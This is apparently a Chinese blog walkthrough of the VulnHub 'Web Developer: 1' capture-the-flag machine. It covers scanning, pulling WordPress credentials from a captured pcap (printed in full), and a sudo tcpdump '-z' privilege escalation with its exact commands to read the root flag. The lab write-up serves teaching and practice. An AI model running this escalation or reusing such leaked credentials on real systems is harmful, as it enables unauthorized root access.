vulnhub-Web Developer 1靶机

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

靶机在192.168.114.129,扫描端口

有网站服务,访问

没什么东西,扫目录

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

这次多出来一个ipdata目录

里面有个cap文件,下载

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

根据sudo -l,我们可以运行tcpdump

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

相关推荐
Coovally AI模型快速验证16 天前
基于YOLOv5s的无人机航拍输电线瓷瓶检测(附数据集与操作步骤)
人工智能·深度学习·yolo·视觉检测·无人机·安全性测试
卓码测评16 天前
第三方软件测评机构简析:软件安全性测试的方法和流程
软件测试·安全性测试
腾讯WeTest2 个月前
防范小程序隐私合规风险,筑牢用户信任防线
小程序·安全性测试
炫彩@之星2 个月前
怎样更改电脑的MAC地址?
web安全·macos·网络安全·安全性测试
芜丶湖2 个月前
vulnhub靶机 DC-9(渗透测试详解)
linux·网络·web安全·系统安全·安全性测试
测试界的海飞丝2 个月前
BUG分析以及BUG定位
测试工具·单元测试·bug·安全性测试
HUIBUR科技2 个月前
危化品安全生产风险监测预警系统的构建与实施
安全·安全性测试
空暝2 个月前
Eval绕过限制参数限制
数据库·php·安全性测试
Hupea2 个月前
无字母数字webshell之命令执行
网络·php·安全性测试